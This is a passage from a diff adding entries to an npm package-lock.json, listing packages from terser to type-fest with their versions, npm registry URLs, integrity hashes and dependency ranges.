"glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/terser": { + "version": "5.31.3", + "resolved": "https://registry.npmjs.org/terser/-/terser-5.31.3.tgz", + "integrity": "sha512-pAfYn3NIZLyZpa83ZKigvj6Rn9c/vd5KfYGX7cN1mnzqgDcxWvrU5ZtAfIKhEXz9nRecw4z3LXkjaq96/qZqAA==", + "dev": true, + "dependencies": { + "@jridgewell/source-map": "^0.3.3", + "acorn": "^8.8.2", + "commander": "^2.20.0", + "source-map-support": "~0.5.20" + }, + "bin": { + "terser": "bin/terser" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/terser-webpack-plugin": { + "version": "5.3.12", + "resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.12.tgz", + "integrity": "sha512-jDLYqo7oF8tJIttjXO6jBY5Hk8p3A8W4ttih7cCEq64fQFWmgJ4VqAQjKr7WwIDlmXKEc6QeoRb5ecjZ+2afcg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.25", + "jest-worker": "^27.4.5", + "schema-utils": "^4.3.0", + "serialize-javascript": "^6.0.2", + "terser": "^5.31.1" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.1.0" + }, + "peerDependenciesMeta": { + "@swc/core": { + "optional": true + }, + "esbuild": { + "optional": true + }, + "uglify-js": { + "optional": true + } + } + }, + "node_modules/terser-webpack-plugin/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/terser-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/terser-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/terser-webpack-plugin/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/terser/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/terser/node_modules/commander": { + "version": "2.20.3", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==", + "dev": true + }, + "node_modules/test-exclude": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", + "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "dev": true, + "dependencies": { + "@istanbuljs/schema": "^0.1.2", + "glob": "^7.1.4", + "minimatch": "^3.0.4" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", + "dependencies": { + "b4a": "^1.6.4" + } + }, + "node_modules/text-table": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", + "integrity": "sha1-f17oI66AUgfACvLfSoTsP8+lcLQ=" + }, + "node_modules/thenby": { + "version": "1.3.4", + "resolved": "https://registry.npmjs.org/thenby/-/thenby-1.3.4.tgz", + "integrity": "sha512-89Gi5raiWA3QZ4b2ePcEwswC3me9JIg+ToSgtE0JWeCynLnLxNr/f9G+xfo9K+Oj4AFdom8YNJjibIARTJmapQ==", + "dev": true + }, + "node_modules/thingies": { + "version": "1.21.0", + "resolved": "https://registry.npmjs.org/thingies/-/thingies-1.21.0.tgz", + "integrity": "sha512-hsqsJsFMsV+aD4s3CWKk85ep/3I9XzYV/IXaSouJMYIoDlgyi11cBhsqYe9/geRfB0YIikBQg6raRaM+nIMP9g==", + "dev": true, + "license": "Unlicense", + "engines": { + "node": ">=10.18" + }, + "peerDependencies": { + "tslib": "^2" + } + }, + "node_modules/thirty-two": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz", + "integrity": "sha1-TKL//AKlEpDSdEueP1V2k8prYno=", + "engines": { + "node": ">=0.2.6" + } + }, + "node_modules/thread-loader": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/thread-loader/-/thread-loader-4.0.2.tgz", + "integrity": "sha512-UOk/KBydsQjh4Ja5kocxDUzhv11KYptHN/h8gdSwo6/MBkYrWqQua6K2qwlpXnCXS9c/uLs8F/JF8rpveF0+fA==", + "dev": true, + "dependencies": { + "json-parse-better-errors": "^1.0.2", + "loader-runner": "^4.1.0", + "neo-async": "^2.6.2", + "schema-utils": "^4.0.1" + }, + "engines": { + "node": ">= 16.10.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/thread-loader/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/thread-loader/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/thread-loader/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/thread-loader/node_modules/schema-utils": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.2.0.tgz", + "integrity": "sha512-L0jRsrPpjdckP3oPug3/VxNKt2trR8TcabrM6FOAAlvC/9Phcmm+cuAgTlxBqdBR1WJx7Naj9WHw+aOmheSVbw==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/thriftrw": { + "version": "3.12.0", + "resolved": "https://registry.npmjs.org/thriftrw/-/thriftrw-3.12.0.tgz", + "integrity": "sha512-4YZvR4DPEI41n4Opwr4jmrLGG4hndxr7387kzRFIIzxHQjarPusH4lGXrugvgb7TtPrfZVTpZCVe44/xUxowEw==", + "dependencies": { + "bufrw": "^1.3.0", + "error": "7.0.2", + "long": "^2.4.0" + }, + "bin": { + "thrift2json": "thrift2json.js" + }, + "engines": { + "node": ">= 0.10.x" + } + }, + "node_modules/thriftrw/node_modules/long": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/long/-/long-2.4.0.tgz", + "integrity": "sha512-ijUtjmO/n2A5PaosNG9ZGDsQ3vxJg7ZW8vsY8Kp0f2yIZWhSJvjmegV7t+9RPQKxKrvj8yKGehhS+po14hPLGQ==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/throng": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/throng/-/throng-4.0.0.tgz", + "integrity": "sha1-mDxroZk7WOroWZmKpof/6I34TBc=", + "dependencies": { + "lodash.defaults": "^4.0.1" + }, + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/throttleit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/throttleit/-/throttleit-1.0.0.tgz", + "integrity": "sha1-nnhYNtr0Z0MUWlmEtiaNgoUorGw=", + "dev": true + }, + "node_modules/through": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz", + "integrity": "sha1-DdTJ/6q8NXlgsbckEV1+Doai4fU=" + }, + "node_modules/through2": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/through2/-/through2-4.0.2.tgz", + "integrity": "sha512-iOqSav00cVxEEICeD7TjLB1sueEL+81Wpzp2bY17uZjZN0pWZPuo4suZ/61VujxmqSGFfgOcNuTZ85QJwNZQpw==", + "dev": true, + "dependencies": { + "readable-stream": "3" + } + }, + "node_modules/thunky": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/thunky/-/thunky-1.1.0.tgz", + "integrity": "sha512-eHY7nBftgThBqOyHGVN+l8gF0BucP09fMo0oO/Lb0w1OF80dJv+lDVpXG60WMQvkcxAkNybKsrEIE3ZtKGmPrA==", + "dev": true, + "license": "MIT" + }, + "node_modules/tildify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/tildify/-/tildify-2.0.0.tgz", + "integrity": "sha512-Cc+OraorugtXNfs50hU9KS369rFXCfgGLpfCfvlc+Ud5u6VWmUQsOAa9HbTvheQdYnrdJqqv1e5oIqXppMYnSw==", + "engines": { + "node": ">=8" + } + }, + "node_modules/timekeeper": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/timekeeper/-/timekeeper-2.2.0.tgz", + "integrity": "sha512-W3AmPTJWZkRwu+iSNxPIsLZ2ByADsOLbbLxe46UJyWj3mlYLlwucKiq+/dPm0l9wTzqoF3/2PH0AGFCebjq23A==", + "dev": true + }, + "node_modules/timers-ext": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/timers-ext/-/timers-ext-0.1.7.tgz", + "integrity": "sha512-b85NUNzTSdodShTIbky6ZF02e8STtVVfD+fu4aXXShEELpozH+bCpJLYMPZbsABN2wDH7fJpqIoXxJpzbf0NqQ==", + "dev": true, + "dependencies": { + "es5-ext": "~0.10.46", + "next-tick": "1" + } + }, + "node_modules/tiny-async-pool": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/tiny-async-pool/-/tiny-async-pool-1.3.0.tgz", + "integrity": "sha512-01EAw5EDrcVrdgyCLgoSPvqznC0sVxDSVeiOz09FUpjh71G79VCqneOr+xvt7T1r76CF6ZZfPjHorN2+d+3mqA==", + "dependencies": { + "semver": "^5.5.0" + } + }, + "node_modules/tiny-async-pool/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/tiny-invariant": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz", + "integrity": "sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==", + "dev": true + }, + "node_modules/tiny-lru": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/tiny-lru/-/tiny-lru-8.0.2.tgz", + "integrity": "sha512-ApGvZ6vVvTNdsmt676grvCkUCGwzG9IqXma5Z07xJgiC5L7akUMof5U8G2JTI9Rz/ovtVhJBlY6mNhEvtjzOIg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/tiny-warning": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/tiny-warning/-/tiny-warning-1.0.3.tgz", + "integrity": "sha512-lBN9zLN/oAf68o3zNXYrdCt1kP8WsiGW8Oo2ka41b2IM5JL/S1CTyX1rW0mb/zSuJun0ZUrDxx4sqvYS2FWzPA==", + "dev": true + }, + "node_modules/tinycolor2": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/tinycolor2/-/tinycolor2-1.6.0.tgz", + "integrity": "sha512-XPaBkWQJdsf3pLKJV9p4qN/S+fm2Oj8AIPo1BTUhg5oxkvm9+SVEGFdhyOz7tTdUTfvxMiAs4sp6/eZO2Ew+pw==", + "dev": true + }, + "node_modules/tinyexec": { + "version": "0.3.2", + "resolved": "https://registry.npmjs.org/tinyexec/-/tinyexec-0.3.2.tgz", + "integrity": "sha512-KQQR9yN7R5+OSwaK0XQoj22pwHoTlgYqmUscPYoknOoWCWfj/5/ABTMRi69FrKU5ffPVh5QcFikpWJI/P1ocHA==", + "dev": true, + "license": "MIT" + }, + "node_modules/tinyrainbow": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/tinyrainbow/-/tinyrainbow-1.2.0.tgz", + "integrity": "sha512-weEDEq7Z5eTHPDh4xjX789+fHfF+P8boiFB+0vbWzpbnbsEr/GRaohi/uMKxg8RZMXnl1ItAi/IUHWMsjDV7kQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/tinyspy": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/tinyspy/-/tinyspy-3.0.2.tgz", + "integrity": "sha512-n1cw8k1k0x4pgA2+9XrOkFydTerNcJ1zWCO5Nn9scWHTD+5tp8dghT2x1uduQePZTZgd3Tupf+x9BxJjeJi77Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/tlds": { + "version": "1.228.0", + "resolved": "https://registry.npmjs.org/tlds/-/tlds-1.228.0.tgz", + "integrity": "sha512-Q0TU9zh5hDs2CpRFNM7SOW3K7OSgUgJC/cMrq9t44ei4tu+G3KV8BZyIJuYVvryJHH96mKgc9WXdhgKVvGD7jg==", + "dev": true, + "bin": { + "tlds": "bin.js" + } + }, + "node_modules/tmatch": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/tmatch/-/tmatch-2.0.1.tgz", + "integrity": "sha512-OHn/lzGWAsh5MBNTXUiHc595HAbIASCs6M+hDrkMObbSzsXej0SCKrQxr4J6EmRHbdo3qwyetPzuzEktkZiy4g==", + "dev": true + }, + "node_modules/tmp": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.3.tgz", + "integrity": "sha512-nZD7m9iCPC5g0pYmcaxogYKggSfLsdxl8of3Q/oIbqCqLLIO9IAF0GWjX1z9NZRHPiXv8Wex4yDCaZsgEw0Y8w==", + "engines": { + "node": ">=14.14" + } + }, + "node_modules/to-object-path": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/to-object-path/-/to-object-path-0.3.0.tgz", + "integrity": "sha512-9mWHdnGRuh3onocaHzukyvCZhzvr6tiflAy/JRFXcJX0TjgfWA9pk9t8CMbzmBE4Jfw58pXbkngtBtqYxzNEyg==", + "dev": true, + "dependencies": { + "kind-of": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/to-object-path/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/to-regex": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/to-regex/-/to-regex-3.0.2.tgz", + "integrity": "sha512-FWtleNAtZ/Ki2qtqej2CXTOayOH9bHDQF+Q48VpWyDXjbYxA4Yz8iDB31zXOBUlOHHKidDbqGVrTUvQMPmBGBw==", + "dev": true, + "dependencies": { + "define-property": "^2.0.2", + "extend-shallow": "^3.0.2", + "regex-not": "^1.0.2", + "safe-regex": "^1.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dependencies": { + "is-number": "^7.0.0" + }, + "engines": { + "node": ">=8.0" + } + }, + "node_modules/to-string-loader": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/to-string-loader/-/to-string-loader-1.2.0.tgz", + "integrity": "sha512-KsWUL8FccgBW9FPFm4vYoQbOOcO5m6hKOGYoXjbseD9/4Ft+ravXN5jolQ9kTKYcK4zPt1j+khx97GPGnVoi6A==", + "dev": true, + "dependencies": { + "loader-utils": "^1.0.0" + } + }, + "node_modules/to-string-loader/node_modules/big.js": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-5.2.2.tgz", + "integrity": "sha512-vyL2OymJxmarO8gxMr0mhChsO9QGwhynfuu4+MHTAW6czfq9humCB7rKpUjDd9YUiDPU4mzpyupFSvOClAwbmQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/to-string-loader/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dev": true, + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/to-string-loader/node_modules/loader-utils": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.2.tgz", + "integrity": "sha512-I5d00Pd/jwMD2QCduo657+YM/6L3KZu++pmX9VFncxaxvHcru9jx1lBaFft+r4Mt2jK0Yhp41XlRAihzPxHNCg==", + "dev": true, + "dependencies": { + "big.js": "^5.2.2", + "emojis-list": "^3.0.0", + "json5": "^1.0.1" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/to-through": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/to-through/-/to-through-3.0.0.tgz", + "integrity": "sha512-y8MN937s/HVhEoBU1SxfHC+wxCHkV1a9gW8eAdTadYh/bGyesZIVcbjI+mSpFbSVwQici/XjBjuUyri1dnXwBw==", + "dev": true, + "dependencies": { + "streamx": "^2.12.5" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/toidentifier": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", + "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/token-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/token-stream/-/token-stream-1.0.0.tgz", + "integrity": "sha1-zCAOqyYT9BZtJ/+a/HylbUnfbrQ=" + }, + "node_modules/toposort": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/toposort/-/toposort-2.0.2.tgz", + "integrity": "sha1-riF2gXXRVZ1IvvNUILL0li8JwzA=", + "dev": true + }, + "node_modules/toposort-class": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toposort-class/-/toposort-class-1.0.1.tgz", + "integrity": "sha1-f/0feMi+KMO6Rc1OGj9e4ZO9mYg=" + }, + "node_modules/touch": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz", + "integrity": "sha512-WBx8Uy5TLtOSRtIq+M03/sKDrXCLHxwDcquSP2c43Le03/9serjQBIztjRz6FkJez9D/hleyAXTBGLwwZUw9lA==", + "dev": true, + "dependencies": { + "nopt": "~1.0.10" + }, + "bin": { + "nodetouch": "bin/nodetouch.js" + } + }, + "node_modules/touch/node_modules/nopt": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-1.0.10.tgz", + "integrity": "sha512-NWmpvLSqUrgrAC9HCuxEvb+PSloHpqVu+FqcO4eeF2h5qYRhA7ev6KvelyQAKtegUbC6RypJnlEOhd8vloNKYg==", + "dev": true, + "dependencies": { + "abbrev": "1" + }, + "bin": { + "nopt": "bin/nopt.js" + }, + "engines": { + "node": "*" + } + }, + "node_modules/tough-cookie": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-4.1.3.tgz", + "integrity": "sha512-aX/y5pVRkfRnfmuX+OdbSdXvPe6ieKX/G2s7e98f4poJHnqH3281gDPm/metm6E/WRamfx7WC4HUqkWHfQHprw==", + "dependencies": { + "psl": "^1.1.33", + "punycode": "^2.1.1", + "universalify": "^0.2.0", + "url-parse": "^1.5.3" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/tough-cookie/node_modules/universalify": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-0.2.0.tgz", + "integrity": "sha512-CJ1QgKmNg3CwvAv/kOFmtnEN05f0D/cn9QntgNOQlQF9dgvVTHj3t+8JPdjqawCHk7V/KA+fbUqzZ9XWhcqPUg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/traverse": { + "version": "0.6.9", + "resolved": "https://registry.npmjs.org/traverse/-/traverse-0.6.9.tgz", + "integrity": "sha512-7bBrcF+/LQzSgFmT0X5YclVqQxtv7TDJ1f8Wj7ibBu/U6BMLeOpUxuZjV7rMc44UtKxlnMFigdhFAIszSX1DMg==", + "license": "MIT", + "dependencies": { + "gopd": "^1.0.1", + "typedarray.prototype.slice": "^1.0.3", + "which-typed-array": "^1.1.15" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/tree-dump": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/tree-dump/-/tree-dump-1.0.2.tgz", + "integrity": "sha512-dpev9ABuLWdEubk+cIaI9cHwRNNDjkBBLXTwI4UCUFdQ5xXKqNXoK4FEciw/vxf+NQ7Cb7sGUyeUtORvHIdRXQ==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/ts-api-utils": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-1.3.0.tgz", + "integrity": "sha512-UQMIo7pb8WRomKR1/+MFVLTroIvDVtMX3K6OUir8ynLyzB8Jeriont2bTAtmNPa1ekAgN7YPDyf6V+ygrdU+eQ==", + "dev": true, + "engines": { + "node": ">=16" + }, + "peerDependencies": { + "typescript": ">=4.2.0" + } + }, + "node_modules/ts-dedent": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/ts-dedent/-/ts-dedent-2.2.0.tgz", + "integrity": "sha512-q5W7tVM71e2xjHZTlgfTDoPF/SmqKG5hddq9SzR49CH2hayqRKJtQ4mtRlSxKaJlR/+9rEM+mnBHf7I2/BQcpQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.10" + } + }, + "node_modules/tsconfig-paths": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/tsconfig-paths/-/tsconfig-paths-3.14.1.tgz", + "integrity": "sha512-fxDhWnFSLt3VuTwtvJt5fpwxBHg5AdKWMsgcPOOIilyjymcYVZoCQF8fvFRezCNfblEXmi+PcM1eYHeOAgXCOQ==", + "dev": true, + "dependencies": { + "@types/json5": "^0.0.29", + "json5": "^1.0.1", + "minimist": "^1.2.6", + "strip-bom": "^3.0.0" + } + }, + "node_modules/tsconfig-paths/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dev": true, + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/tslib": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.2.tgz", + "integrity": "sha512-5svOrSA2w3iGFDs1HibEVBGbDrAY82bFQ3HZ3ixB+88nsbsWQoKqDRb5UBYAUPEzbBn6dAp5gRNXglySbx1MlA==" + }, + "node_modules/tsscmp": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/tsscmp/-/tsscmp-1.0.6.tgz", + "integrity": "sha512-LxhtAkPDTkVCMQjt2h6eBVY28KCjikZqZfMcC15YBeNjkgUpdCfBu5HoiOTDu86v6smE8yOjyEktJ8hlbANHQA==", + "engines": { + "node": ">=0.6.x" + } + }, + "node_modules/tty-browserify": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/tty-browserify/-/tty-browserify-0.0.1.tgz", + "integrity": "sha512-C3TaO7K81YvjCgQH9Q1S3R3P3BtN3RIM8n+OvX4il1K1zgE8ZhI0op7kClgkxtutIE8hQrcrHBXvIheqKUUCxw==", + "dev": true + }, + "node_modules/tunnel-agent": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", + "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", + "dependencies": { + "safe-buffer": "^5.0.1" + }, + "engines": { + "node": "*" + } + }, + "node_modules/tweetnacl": { + "version": "0.14.5", + "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", + "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" + }, + "node_modules/type": { + "version": "2.7.2", + "resolved": "https://registry.npmjs.org/type/-/type-2.7.2.tgz", + "integrity": "sha512-dzlvlNlt6AXU7EBSfpAscydQ7gXB+pPGsPnfJnZpiNJBDj7IaJzQlBZYGdEi4R9HmPdBv2XmWJ6YUtoTa7lmCw==" + }, + "node_modules/type-check": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", + "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", + "dependencies": { + "prelude-ls": "^1.2.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/type-detect": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", + "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/type-fest": { + "version": "0.20.2", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", + "integrity": 